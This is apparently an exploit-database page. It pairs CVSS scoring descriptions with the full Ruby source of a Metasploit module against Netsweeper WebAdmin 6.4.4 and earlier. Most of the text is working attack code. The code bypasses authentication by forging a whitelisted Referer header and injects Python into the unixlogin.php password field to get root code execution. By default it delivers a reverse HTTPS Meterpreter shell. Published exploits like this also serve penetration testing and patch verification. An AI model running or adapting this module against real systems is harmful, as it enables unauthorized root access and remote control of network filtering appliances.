The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
High
AC
The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: Netsweeper WebAdmin unixlogin.php Python Code Injection
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Netsweeper WebAdmin unixlogin.php Python Code Injection',
'Description' => %q{
This module exploits a Python code injection in the Netsweeper
WebAdmin component's unixlogin.php script, for versions 6.4.4 and
prior, to execute code as the root user.
Authentication is bypassed by sending a random whitelisted Referer
header in each request.
Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
been confirmed exploitable.
},
'Author' => [
# Reported to SecuriTeam SSD by an anonymous researcher
# Reference exploit written by said anonymous researcher
# Publicly disclosed by Noam Rathaus of SecuriTeam's SSD
'wvu' # Module
],
'References' => [
['URL', 'https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/'],
['URL', 'https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says']
],
'DisclosureDate' => '2020-04-28', # SecuriTeam SSD advisory
'License' => MSF_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Privileged' => true,
'Targets' => [['Python', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true,
'PAYLOAD' => 'python/meterpreter/reverse_https'
},
'Notes' => {
'NOCVE' => 'Publicly disclosed via SecuriTeam SSD advisory',
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,
'/webadmin/tools/systemstatus_remote.php'),
'headers' => {
'Referer' => rand_referer(:check) # Auth bypass via Referer header
}
)
unless res
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.code == 200
return CheckCode::Unknown('Target is not running Netsweeper.')
end
if res.body.include?('Permission Denied: Unauthorized access.')
return CheckCode::Safe('Target has rejected our Referer auth bypass.')
end
# Example version information from /webadmin/tools/systemstatus_remote.php:
# Version: 6.4.3
# Build Date: 2020-03-27 14:15:19
# Database Version: 139
unless (version = res.body.scan(/^Version: ([\d.]+)$/).flatten.first)
return CheckCode::Detected(
'Target did not respond with Netsweeper version.'
)
end
if Gem::Version.new(version) <= Gem::Version.new('6.4.4')
return CheckCode::Appears(
"Netsweeper #{version} is a vulnerable version."
)
end
CheckCode::Safe("Netsweeper #{version} is NOT a vulnerable version.")
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
referer = rand_referer(:exploit)
vprint_status("Selecting random whitelisted Referer header: #{referer}")
vprint_status("Injecting Python code into password field: #{fake_password}")
normie_uri = normalize_uri(target_uri.path, '/webadmin/tools/unixlogin.php')
print_status("Sending #{datastore['PAYLOAD']} to #{full_uri(normie_uri)}")
# The application may block on the payload, so time out reasonably soon
res = send_request_cgi({
'method' => 'POST',
'uri' => normie_uri,
'headers' => {
'Referer' => referer
},
'vars_post' => {
'login' => '.', # Bypass user check by injecting `grep . /etc/shadow'
'password' => fake_password
}
}, 3.5)
return unless res
# An unexpected reply typically means some sort of error, so print it out
fail_with(Failure::UnexpectedReply, res.body)
end
def fake_password
return @fake_password if @fake_password
# Arguments for crypt.crypt(): https://docs.python.org/2/library/crypt.html
word = rand_text_alphanumeric(8..42)
salt = rand_text_alphanumeric(2) # This is DES-safe because we remove algo
# Python code injection occurs in the $2 positional parameter from sh(1):
# password=$($PYTHON -c "import crypt; print crypt.crypt('$2', '\$$algo\$$salt\$')")
@fake_password = "#{word}', '#{salt}'); #{payload.encoded} #"
end
# Select a random Referer [sic] header value from an appropriate whitelist
def rand_referer(method = :check)
case method
when :check
%w[
webadmin/admin/systemstatus_inc_data.php
webadmin/api/
webadmin/common/systemstatus_overview_ajax.php
].sample
when :exploit
%w[
systemconfig/edit_database_settings.php
systemconfig/edit_file.php
systemconfig/manage_certs.php
webadmin/admin/service_manager_data.php
webadmin/api/
webadmin/systemconfig/edit_email_sending_settings.php
webadmin/systemconfig/grant_db_access.php
].sample
else
fail_with(Failure::BadConfig,
"I don't know how to #{method}, but I do know how to love")
end
end
end